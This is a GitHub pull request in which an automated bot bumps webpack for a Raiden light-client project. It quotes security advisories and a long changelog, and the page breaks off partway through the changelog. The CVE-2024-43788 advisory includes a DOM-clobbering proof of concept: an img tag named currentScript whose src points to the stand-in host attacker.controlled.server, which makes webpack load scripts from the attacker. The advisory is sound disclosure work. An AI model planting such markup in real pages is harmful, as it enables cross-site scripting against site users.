search

raiden-network / light-client

The Raiden Light Client
https://raiden.network/
MIT License
33 stars 31 forks source link

deps: Update dependency webpack to v5.94.0 [SECURITY] #3195

Open renovate[bot] opened 1 year ago

renovate[bot] commented 1 year ago

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
webpack 5.74.0 -> 5.94.0 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2023-28154

Webpack 5 before 5.76.0 does not avoid cross-realm object access. ImportParserPlugin.js mishandles the magic comment feature. An attacker who controls a property of an untrusted object can obtain access to the real global object.

CVE-2024-43788

Summary

We discovered a DOM Clobbering vulnerability in Webpack’s AutoPublicPathRuntimeModule. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.

We found the real-world exploitation of this gadget in the Canvas LMS which allows XSS attack happens through an javascript code compiled by Webpack (the vulnerable part is from Webpack). We believe this is a severe issue. If Webpack’s code is not resilient to DOM Clobbering attacks, it could lead to significant security vulnerabilities in any web application using Webpack-compiled code.

Details

Backgrounds

DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:

[1] https://scnps.co/papers/sp23_domclob.pdf [2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/

Gadgets found in Webpack

We identified a DOM Clobbering vulnerability in Webpack’s AutoPublicPathRuntimeModule. When the output.publicPath field in the configuration is not set or is set to auto, the following code is generated in the bundle to dynamically resolve and load additional JavaScript files:

/******/    /* webpack/runtime/publicPath */
/******/    (() => {
/******/        var scriptUrl;
/******/        if (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + "";
/******/        var document = __webpack_require__.g.document;
/******/        if (!scriptUrl && document) {
/******/            if (document.currentScript)
/******/                scriptUrl = document.currentScript.src;
/******/            if (!scriptUrl) {
/******/                var scripts = document.getElementsByTagName("script");
/******/                if(scripts.length) {
/******/                    var i = scripts.length - 1;
/******/                    while (i > -1 && (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;
/******/                }
/******/            }
/******/        }
/******/        // When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration
/******/        // or pass an empty string ("") and set the __webpack_public_path__ variable from your code to use your own logic.
/******/        if (!scriptUrl) throw new Error("Automatic publicPath is not supported in this browser");
/******/        scriptUrl = scriptUrl.replace(/#.*$/, "").replace(/\?.*$/, "").replace(/\/[^\/]+$/, "/");
/******/        __webpack_require__.p = scriptUrl;
/******/    })();

However, this code is vulnerable to a DOM Clobbering attack. The lookup on the line with document.currentScript can be shadowed by an attacker, causing it to return an attacker-controlled HTML element instead of the current script element as intended. In such a scenario, the src attribute of the attacker-controlled element will be used as the scriptUrl and assigned to __webpack_require__.p. If additional scripts are loaded from the server, __webpack_require__.p will be used as the base URL, pointing to the attacker's domain. This could lead to arbitrary script loading from the attacker's server, resulting in severe security risks.

PoC

Please note that we have identified a real-world exploitation of this vulnerability in the Canvas LMS. Once the issue has been patched, I am willing to share more details on the exploitation. For now, I’m providing a demo to illustrate the concept.

Consider a website developer with the following two scripts, entry.js and import1.js, that are compiled using Webpack:

// entry.js
import('./import1.js')
  .then(module => {
    module.hello();
  })
  .catch(err => {
    console.error('Failed to load module', err);
  });
// import1.js
export function hello () {
  console.log('Hello');
}

The webpack.config.js is set up as follows:

const path = require('path');

module.exports = {
  entry: './entry.js', // Ensure the correct path to your entry file
  output: {
    filename: 'webpack-gadgets.bundle.js', // Output bundle file
    path: path.resolve(__dirname, 'dist'), // Output directory
    publicPath: "auto", // Or leave this field not set
  },
  target: 'web',
  mode: 'development',
};

When the developer builds these scripts into a bundle and adds it to a webpage, the page could load the import1.js file from the attacker's domain, attacker.controlled.server. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.

<!DOCTYPE html>
<html>
<head>
  <title>Webpack Example</title>
  <!-- Attacker-controlled Script-less HTML Element starts--!>
  <img name="currentScript" src="https://attacker.controlled.server/"></img>
  <!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script src="./dist/webpack-gadgets.bundle.js"></script>
<body>
</body>
</html>

Impact

This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes.

Patch

A possible patch to this vulnerability could refer to the Google Closure project which makes itself resistant to DOM Clobbering attack: https://github.com/google/closure-library/blob/b312823ec5f84239ff1db7526f4a75cba0420a33/closure/goog/base.js#L174

/******/    /* webpack/runtime/publicPath */
/******/    (() => {
/******/        var scriptUrl;
/******/        if (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + "";
/******/        var document = __webpack_require__.g.document;
/******/        if (!scriptUrl && document) {
/******/            if (document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT') // Assume attacker cannot control script tag, otherwise it is XSS already :>
/******/                scriptUrl = document.currentScript.src;
/******/            if (!scriptUrl) {
/******/                var scripts = document.getElementsByTagName("script");
/******/                if(scripts.length) {
/******/                    var i = scripts.length - 1;
/******/                    while (i > -1 && (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;
/******/                }
/******/            }
/******/        }
/******/        // When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration
/******/        // or pass an empty string ("") and set the __webpack_public_path__ variable from your code to use your own logic.
/******/        if (!scriptUrl) throw new Error("Automatic publicPath is not supported in this browser");
/******/        scriptUrl = scriptUrl.replace(/#.*$/, "").replace(/\?.*$/, "").replace(/\/[^\/]+$/, "/");
/******/        __webpack_require__.p = scriptUrl;
/******/    })();

Please note that if we do not receive a response from the development team within three months, we will disclose this vulnerability to the CVE agent.

Release Notes

webpack/webpack (webpack) ### [`v5.94.0`](https://redirect.github.com/webpack/webpack/compare/v5.93.0...eabf85d8580dfcb876b56957ba5488222a4f7873) [Compare Source](https://redirect.github.com/webpack/webpack/compare/v5.93.0...v5.94.0) ### [`v5.93.0`](https://redirect.github.com/webpack/webpack/compare/v5.92.1...277460b33bcc49c51acbbcd688672aa4ec685732) [Compare Source](https://redirect.github.com/webpack/webpack/compare/v5.92.1...v5.93.0) ### [`v5.92.1`](https://redirect.github.com/webpack/webpack/compare/v5.92.0...a82e0cd00e26d8452295f0d680417e4656a6d7cc) [Compare Source](https://redirect.github.com/webpack/webpack/compare/v5.92.0...v5.92.1) ### [`v5.92.0`](https://redirect.github.com/webpack/webpack/releases/tag/v5.92.0) [Compare Source](https://redirect.github.com/webpack/webpack/compare/v5.91.0...v5.92.0) #### Bug Fixes - Correct tidle range's comutation for module federation - Consider runtime for pure expression dependency update hash - Return value in the `subtractRuntime` function for runtime logic - Fixed failed to resolve promise when eager import a dynamic cjs - Avoid generation extra code for external modules when remapping is not required - The `css/global` type now handles the exports name - Avoid hashing for `@keyframe` and `@property` at-rules in `css/global` type - Fixed mangle with destructuring for JSON modules - The `stats.hasWarnings()` method now respects the `ignoreWarnings` option - Fixed `ArrayQueue` iterator - Correct behavior of `__webpack_exports_info__.a.b.canMangle` - Changed to the correct plugin name for the `CommonJsChunkFormatPlugin` plugin - Set the `chunkLoading` option to the `import` when environment is unknown and output is module - Fixed when runtimeChunk has no exports when `module` chunkFormat used - \[CSS] Fixed parsing minimized CSS import - \[CSS] URLs in CSS files now have correct public path - \[CSS] The `css` module type should not allow parser to switch mode - \[Types] Improved context module types #### New Features - Added platform target properties to compiler - Improved multi compiler cache location and validating it - Support `import attributes` spec (`with` keyword) - Support `node:` prefix for Node.js core modules in runtime code - Support prefetch/preload for module chunk format - Support "..." in the `importsFields` option for resolver - Root module is less prone to be wrapped in IIFE - Export `InitFragment` class for plugins - Export `compileBooleanMatcher` util for plugins - Export `InputFileSystem` and `OutputFileSystem` types - \[CSS] Support the `esModule` generator option for CSS modules - \[CSS] Support CSS when chunk format is module ### [`v5.91.0`](https://redirect.github.com/webpack/webpack/releases/tag/v5.91.0) [Compare Source](https://redirect.github.com/webpack/webpack/compare/v5.90.3...v5.91.0) #### Bug Fixes - Deserializer for ignored modules doesn't crash - Allow the `unsafeCache` option to be a proxy object - Normalize the `snapshot.unmanagedPaths` option - Fixed `fs` types - Fixed resolve's plugins types - Fixed wrongly calculate postOrderIndex - Fixed watching types - Output import attrbiutes/import assertions for external JS imports - Throw an error when DllPlugin needs to generate multiple manifest files, but the path is the same - \[CSS] Output `layer`/`supports`/`media` for external CSS imports #### New Features - Allow to customize the stage of BannerPlugin - \[CSS] Support CSS exports convention - \[CSS] support CSS local ident name - \[CSS] Support `__webpack_nonce__` for CSS chunks - \[CSS] Support `fetchPriority` for CSS chunks - \[CSS] Allow to use LZW to compress css head meta (enabled in the `production` mode by default) - \[CSS] Support prefetch/preload for CSS chunks ### [`v5.90.3`](https://redirect.github.com/webpack/webpack/releases/tag/v5.90.3) [Compare Source](https://redirect.github.com/webpack/webpack/compare/v5.90.2...v5.90.3) #### Bug Fixes - don't mangle when destructuring a reexport - types for `Stats.toJson()` and `Stats.toString()` - many internal types - \[CSS] clean up export css local vars #### Perf - simplify and optimize chunk graph creation ### [`v5.90.2`](https://redirect.github.com/webpack/webpack/releases/tag/v5.90.2) [Compare Source](https://redirect.github.com/webpack/webpack/compare/v5.90.1...v5.90.2) #### Bug Fixes - use `Math.imul` in `fnv1a32` to avoid loss of precision, directly hash UTF16 values - the `setStatus()` of the HMR module should not return an array, which may cause infinite recursion - `__webpack_exports_info__.xxx.canMangle` shouldn't always same as default - mangle export with destructuring - use new runtime to reconsider skipped connections `activeState` - make dynamic import optional in `try/catch` - improve auto publicPath detection #### Dependencies & Maintenance - improve CI setup and include Node.js@21 ### [`v5.90.1`](https://redirect.github.com/webpack/webpack/releases/tag/v5.90.1) [Compare Source](https://redirect.github.com/webpack/webpack/compare/v5.90.0...v5.90.1) #### Bug Fixes - set `unmanagedPaths` in defaults - correct `preOrderIndex` and `postOrderIndex` - add fallback for MIME mismatch error in async wasm loading - browsers versions of ECMA features #### Performance - optimize `compareStringsNumeric` - optimize `numberHash` using 32-bit FNV1a for small ranges, 64-bit for larger - reuse VM context across webpack magic comments ### [`v5.90.0`](https://redirect.github.com/webpack/webpack/releases/tag/v5.90.0) [Compare Source](https://redirect.github.com/webpack/webpack/compare/v5.89.0...v5.90.0) #### Bug Fixes - Fixed inner graph for classes - Optimized `RemoveParentModulesPlugin` via bigint arithmetic - Fixed worklet detection in production mode - Fixed an error for cyclic importModule - Fixed types for `Server` and `Dirent` - Added the `fetchPriority` to hmr runtime's `ensureChunk` function - Don't warn about dynamic import for build dependencies - External module generation respects the `output.environment.arrowFunction` option - Fixed consumimng shared runtime module logic - Fixed a runtime logic of multiple chunks - Fixed destructing assignment of dynamic import json file - Passing errors array for a module hash - Added `/*#__PURE__*/` to generated `JSON.parse()` - Generated a library manifest after clean plugin - Fixed non `amd` externals and `amd` library - Fixed a bug in `SideEffectsFlagPlugin` with namespace re-exports - Fixed an error message for condition `or` - The `strictModuleErrorHandling` is now working - Clean up child compilation chunk graph to avoid memory leak - \[CSS] - Fixed CSS import prefer relative resolution - \[CSS] - Fixed CSS runtime chunk loading error message #### New Features - Allow to set `false` for dev server in `webpack.config.js` - Added a warning for async external when not supported - Added a warning for async module when not supported - Added the `node-module` option for the `node.__filename/__dirname` and enable it by default for ESM target - Added the `snapshot.unmanagedPaths` option - Exposed the `MultiCompilerOptions` type - \[CSS] - Added CSS parser options to enable/disable named exports - \[CSS] - Moved CSS the `exportsOnly` option to CSS generator options #### Dependencies & Maintenance - use node.js LTS version for lint - bump actions/cache from 3 to 4 - bump prettier from 3.2.1 to 3.2.3 - bump assemblyscript - bump actions/checkout from 3 to 4 **Full Changelog**: https://github.com/webpack/webpack/compare/v5.89.0...v5.90.0 ### [`v5.89.0`](https://redirect.github.com/webpack/webpack/releases/tag/v5.89.0) [Compare Source](https://redirect.github.com/webpack/webpack/compare/v5.88.2...v5.89.0) #### New Features - Make CommonJS import preserve chained expressions by [@​bworline](https://redirect.github.com/bworline) in [https://github.com/webpack/webpack/pull/17718](https://redirect.github.com/webpack/webpack/pull/17718) #### Dependencies & Maintenance - chore(deps-dev): bump [@​types/node](https://redirect.github.com/types/node) from 20.3.1 to 20.4.8 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17568](https://redirect.github.com/webpack/webpack/pull/17568) - docs: add example for stats detailed output by [@​ersachin3112](https://redirect.github.com/ersachin3112) in [https://github.com/webpack/webpack/pull/17420](https://redirect.github.com/webpack/webpack/pull/17420) - docs: add example for stats normal output by [@​ersachin3112](https://redirect.github.com/ersachin3112) in [https://github.com/webpack/webpack/pull/17426](https://redirect.github.com/webpack/webpack/pull/17426) - chore(deps-dev): bump core-js from 3.31.0 to 3.32.0 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17539](https://redirect.github.com/webpack/webpack/pull/17539) - chore(deps-dev): bump pretty-format from 29.5.0 to 29.6.2 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17536](https://redirect.github.com/webpack/webpack/pull/17536) - chore(deps-dev): bump [@​types/node](https://redirect.github.com/types/node) from 20.4.8 to 20.4.9 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17583](https://redirect.github.com/webpack/webpack/pull/17583) - chore(deps-dev): bump less from 4.1.3 to 4.2.0 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17580](https://redirect.github.com/webpack/webpack/pull/17580) - chore(deps): bump semver from 5.7.1 to 5.7.2 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17483](https://redirect.github.com/webpack/webpack/pull/17483) - chore(deps-dev): bump simple-git from 3.19.0 to 3.19.1 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17427](https://redirect.github.com/webpack/webpack/pull/17427) - chore(deps-dev): bump [@​types/node](https://redirect.github.com/types/node) from 20.4.9 to 20.6.0 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17666](https://redirect.github.com/webpack/webpack/pull/17666) **Full Changelog**: https://github.com/webpack/webpack/compare/v5.88.2...v5.89.0 ### [`v5.88.2`](https://redirect.github.com/webpack/webpack/releases/tag/v5.88.2) [Compare Source](https://redirect.github.com/webpack/webpack/compare/v5.88.1...v5.88.2) #### Bug Fixes - Fixed a bug where unused identifiers should retain names when using css modules by [@​burhanuday](https://redirect.github.com/burhanuday) in [https://github.com/webpack/webpack/pull/17444](https://redirect.github.com/webpack/webpack/pull/17444) **Full Changelog**: https://github.com/webpack/webpack/compare/v5.88.1...v5.88.2 ### [`v5.88.1`](https://redirect.github.com/webpack/webpack/releases/tag/v5.88.1) [Compare Source](https://redirect.github.com/webpack/webpack/compare/v5.88.0...v5.88.1) #### Developer Experience - Significantly improve TypeScript coverage for Library Plugins by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17414](https://redirect.github.com/webpack/webpack/pull/17414) **Full Changelog**: https://github.com/webpack/webpack/compare/v5.88.0...v5.88.1 ### [`v5.88.0`](https://redirect.github.com/webpack/webpack/releases/tag/v5.88.0) [Compare Source](https://redirect.github.com/webpack/webpack/compare/v5.87.0...v5.88.0) #### New Features - \[CSS] - Use `css/auto` as the default css mode by [@​burhanuday](https://redirect.github.com/burhanuday) in [https://github.com/webpack/webpack/pull/17399](https://redirect.github.com/webpack/webpack/pull/17399) #### Bug Fixes - Fix bugs related to require.context and layer by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17388](https://redirect.github.com/webpack/webpack/pull/17388) - Fix bug in runtime for CSS loading by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17400](https://redirect.github.com/webpack/webpack/pull/17400) - Correct indirect call for tagged template expressions using correct this context by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17397](https://redirect.github.com/webpack/webpack/pull/17397) - Update environment support for KaiOS browser by [@​steverep](https://redirect.github.com/steverep) in [https://github.com/webpack/webpack/pull/17395](https://redirect.github.com/webpack/webpack/pull/17395) - Fix async module runtime code for running top-level-await by [@​ahabhgk](https://redirect.github.com/ahabhgk) in [https://github.com/webpack/webpack/pull/17393](https://redirect.github.com/webpack/webpack/pull/17393) #### Developer Experience - Add example for stats minimal output by [@​ersachin3112](https://redirect.github.com/ersachin3112) in [https://github.com/webpack/webpack/pull/17406](https://redirect.github.com/webpack/webpack/pull/17406) - Significantly improve type coverage for Dependency, Runtime, Template classes by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17394](https://redirect.github.com/webpack/webpack/pull/17394) #### Dependencies & Maintenance - Bump browserslist from 4.21.8 to 4.21.9 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17389](https://redirect.github.com/webpack/webpack/pull/17389) - Bump acorn from 8.8.2 to 8.9.0 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17402](https://redirect.github.com/webpack/webpack/pull/17402) - Bump eslint from 8.42.0 to 8.43.0 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17401](https://redirect.github.com/webpack/webpack/pull/17401) - Bump eslint-plugin-jest from 27.2.1 to 27.2.2 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17407](https://redirect.github.com/webpack/webpack/pull/17407) #### New Contributors - [@​steverep](https://redirect.github.com/steverep) made their first contribution in [https://github.com/webpack/webpack/pull/17395](https://redirect.github.com/webpack/webpack/pull/17395) **Full Changelog**: https://github.com/webpack/webpack/compare/v5.87.0...v5.88.0 ### [`v5.87.0`](https://redirect.github.com/webpack/webpack/releases/tag/v5.87.0) [Compare Source](https://redirect.github.com/webpack/webpack/compare/v5.86.0...v5.87.0) #### New Features - Implement `fetchPriority` feature as parser option and magic comment by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17249](https://redirect.github.com/webpack/webpack/pull/17249) - \[CSS] - Introduce 'css/auto' as a css module type by [@​ahabhgk](https://redirect.github.com/ahabhgk) in [https://github.com/webpack/webpack/pull/16577](https://redirect.github.com/webpack/webpack/pull/16577) - \[CSS] - Style-specific fields now automatically resolve in package.json by [@​burhanuday](https://redirect.github.com/burhanuday) in [https://github.com/webpack/webpack/pull/17346](https://redirect.github.com/webpack/webpack/pull/17346) - webpack configuration API now accepts "falsy values" loaders and plugins by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17339](https://redirect.github.com/webpack/webpack/pull/17339) #### Bug Fixes - Fix codecov badge in readme by [@​burhanuday](https://redirect.github.com/burhanuday) in [https://github.com/webpack/webpack/pull/17353](https://redirect.github.com/webpack/webpack/pull/17353) #### Developer Experience - Add link to svelte loader for webpack by [@​burhanuday](https://redirect.github.com/burhanuday) in [https://github.com/webpack/webpack/pull/17369](https://redirect.github.com/webpack/webpack/pull/17369) - Increase parser API types in internal plugins across dependency plugins [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17365](https://redirect.github.com/webpack/webpack/pull/17365) #### Dependencies & Maintenance - Bump memfs from 3.5.2 to 3.5.3 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17347](https://redirect.github.com/webpack/webpack/pull/17347) - Bump webpack-cli from 5.1.3 to 5.1.4 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17349](https://redirect.github.com/webpack/webpack/pull/17349) - Bump es-module-lexer from 1.2.1 to 1.3.0 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17362](https://redirect.github.com/webpack/webpack/pull/17362) - Bump [@​types/node](https://redirect.github.com/types/node) from 20.2.5 to 20.3.0 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17361](https://redirect.github.com/webpack/webpack/pull/17361) - Bump core-js from 3.30.2 to 3.31.0 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17360](https://redirect.github.com/webpack/webpack/pull/17360) - Bump browserslist from 4.21.6 to 4.21.8 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17367](https://redirect.github.com/webpack/webpack/pull/17367) - Bump [@​types/node](https://redirect.github.com/types/node) from 20.3.0 to 20.3.1 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17366](https://redirect.github.com/webpack/webpack/pull/17366) #### New Contributors [@​aboktor](https://redirect.github.com/aboktor) made their first contribution in [#​16991](https://redirect.github.com/webpack/webpack/issues/16991) [#​16989](https://redirect.github.com/webpack/webpack/issues/16989) [@​silverwind](https://redirect.github.com/silverwind) made their first contribution in [#​17339](https://redirect.github.com/webpack/webpack/issues/17339) via [#​17329](https://redirect.github.com/webpack/webpack/issues/17329) **Full Changelog**: https://github.com/webpack/webpack/compare/v5.86.0...v5.87.0 ### [`v5.86.0`](https://redirect.github.com/webpack/webpack/releases/tag/v5.86.0) [Compare Source](https://redirect.github.com/webpack/webpack/compare/v5.85.1...v5.86.0) #### New Features - Improved cache size performance via better handling of serialization for errors and bigints by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17282](https://redirect.github.com/webpack/webpack/pull/17282) - Introduce an export default handler function option for `ProgressPlugin` by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17312](https://redirect.github.com/webpack/webpack/pull/17312) - Support passing `RegExp` to `splitChunks.chunks` by [@​hyf0](https://redirect.github.com/hyf0) in [https://github.com/webpack/webpack/pull/17332](https://redirect.github.com/webpack/webpack/pull/17332) #### Bug Fixes - Fix layer capabilities for `ContextModule` types by [@​huozhi](https://redirect.github.com/huozhi) in [https://github.com/webpack/webpack/pull/17310](https://redirect.github.com/webpack/webpack/pull/17310) - Fix compatibility of `__non_webpack_require__` with ES modules by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17308](https://redirect.github.com/webpack/webpack/pull/17308) - Improve type coverage `Chunk`, `ChunkGroup`, and other plugins by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/1731](https://redirect.github.com/webpack/webpack/pull/1731) - Do not add `js` extension for eval source maps when extension is not resolvable by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17331](https://redirect.github.com/webpack/webpack/pull/17331) #### Developer Experience - Improve type coverage for Json Module type and lazy load json-assertions package by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17301](https://redirect.github.com/webpack/webpack/pull/17301) #### Dependencies & Maintenance - Bump memfs from 3.5.1 to 3.5.2 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17315](https://redirect.github.com/webpack/webpack/pull/17315) - Bump webpack-cli from 5.1.1 to 5.1.3 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17314](https://redirect.github.com/webpack/webpack/pull/17314) - Bump eslint from 8.41.0 to 8.42.0 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17313](https://redirect.github.com/webpack/webpack/pull/17313) #### New Contributors - [@​huozhi](https://redirect.github.com/huozhi) made their first contribution in [https://github.com/webpack/webpack/pull/17310](https://redirect.github.com/webpack/webpack/pull/17310) - [@​hyf0](https://redirect.github.com/hyf0) made their first contribution in [https://github.com/webpack/webpack/pull/17332](https://redirect.github.com/webpack/webpack/pull/17332) **Full Changelog**: https://github.com/webpack/webpack/compare/v5.85.1...v5.86.0 ### [`v5.85.1`](https://redirect.github.com/webpack/webpack/releases/tag/v5.85.1) [Compare Source](https://redirect.github.com/webpack/webpack/compare/v5.85.0...v5.85.1) #### Bug Fixes - Fix bug in handling barrel imports ([#​17305](https://redirect.github.com/webpack/webpack/issues/17305)) by [@​bworline](https://redirect.github.com/bworline) in [https://github.com/webpack/webpack/pull/17307](https://redirect.github.com/webpack/webpack/pull/17307) - ***NOTE**: An internal API `BasicEvaluatedExpression.getMemberRangeStarts` has been changed to `BasicEvaluatedExpression.getMemberRanges`, please see type definition changes and the pull request for more information.* #### Dependencies & Maintenance - Bump [@​types/jest](https://redirect.github.com/types/jest) from 29.5.1 to 29.5.2 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17297](https://redirect.github.com/webpack/webpack/pull/17297) **Full Changelog**: https://github.com/webpack/webpack/compare/v5.85.0...v5.85.1 ### [`v5.85.0`](https://redirect.github.com/webpack/webpack/releases/tag/v5.85.0) [Compare Source](https://redirect.github.com/webpack/webpack/compare/v5.84.1...v5.85.0) #### New Features - Add `readonly` cache mode by [@​vankop](https://redirect.github.com/vankop) in [https://github.com/webpack/webpack/pull/15470](https://redirect.github.com/webpack/webpack/pull/15470) - Normalize property accessors for esm namespaces and chained member/call expressions by [@​bworline](https://redirect.github.com/bworline) in [https://github.com/webpack/webpack/pull/17203](https://redirect.github.com/webpack/webpack/pull/17203) - Support `environment` in loader context by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17281](https://redirect.github.com/webpack/webpack/pull/17281) - Introduce a new syntax for `addModule()` support in worklets - `*context.audioWorklet.addModule()` by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17212](https://redirect.github.com/webpack/webpack/pull/17212) #### Bug Fixes - Fix type regression with unknown module type strings by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17266](https://redirect.github.com/webpack/webpack/pull/17266) #### Developer Experience - Use global runtime constants for webpack exports by [@​burhanuday](https://redirect.github.com/burhanuday) in [https://github.com/webpack/webpack/pull/17270](https://redirect.github.com/webpack/webpack/pull/17270) - Add strict mode type coverage for WASM and Runtime code by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17267](https://redirect.github.com/webpack/webpack/pull/17267) - Add strict mode type coverage for runtime modules and runtime plugins by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17261](https://redirect.github.com/webpack/webpack/pull/17261) - Add types for JSON & Asset Modules including their interfacing plugins by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17262](https://redirect.github.com/webpack/webpack/pull/17262) - Add type coverage for Module subclasses and plugins by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17272](https://redirect.github.com/webpack/webpack/pull/17272) #### Dependencies & Maintenance - Use GitHub Discussions instead of Gitter in issue templates by [@​snitin315](https://redirect.github.com/snitin315) in [https://github.com/webpack/webpack/pull/17293](https://redirect.github.com/webpack/webpack/pull/17293) - Bump [@​types/node](https://redirect.github.com/types/node) from 20.2.3 to 20.2.4 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17269](https://redirect.github.com/webpack/webpack/pull/17269) - Bump browserslist from 4.21.5 to 4.21.6 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17275](https://redirect.github.com/webpack/webpack/pull/17275) - Bump [@​types/node](https://redirect.github.com/types/node) from 20.2.4 to 20.2.5 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17276](https://redirect.github.com/webpack/webpack/pull/17276) - Bump [@​babel/core](https://redirect.github.com/babel/core) from 7.21.8 to 7.22.1 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17278](https://redirect.github.com/webpack/webpack/pull/17278) **Full Changelog**: https://github.com/webpack/webpack/compare/v5.84.1...v5.85.0 ### [`v5.84.1`](https://redirect.github.com/webpack/webpack/releases/tag/v5.84.1) [Compare Source](https://redirect.github.com/webpack/webpack/compare/v5.84.0...v5.84.1) #### Bug Fixes - Fix regression in inner graph for reserved identifiers by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17265](https://redirect.github.com/webpack/webpack/pull/17265) #### Dependencies & Maintenance - Bump [@​types/jest](https://redirect.github.com/types/jest) from 29.5.0 to 29.5.1 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17027](https://redirect.github.com/webpack/webpack/pull/17027) - Bump simple-git from 3.18.0 to 3.19.0 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17263](https://redirect.github.com/webpack/webpack/pull/17263) **Full Changelog**: https://github.com/webpack/webpack/compare/v5.84.0...v5.84.1 ### [`v5.84.0`](https://redirect.github.com/webpack/webpack/releases/tag/v5.84.0) [Compare Source](https://redirect.github.com/webpack/webpack/compare/v5.83.1...v5.84.0) #### New Features - SourceMapDevToolPlugin now supports `append` option as a function by [@​snitin315](https://redirect.github.com/snitin315) in [https://github.com/webpack/webpack/pull/17252](https://redirect.github.com/webpack/webpack/pull/17252) #### Bug Fixes - Fix multiple bugs referencing class names when shadowed by import name in properties and methods by [@​alexander-akait](https://redirect.github.com/alexander-akait) in 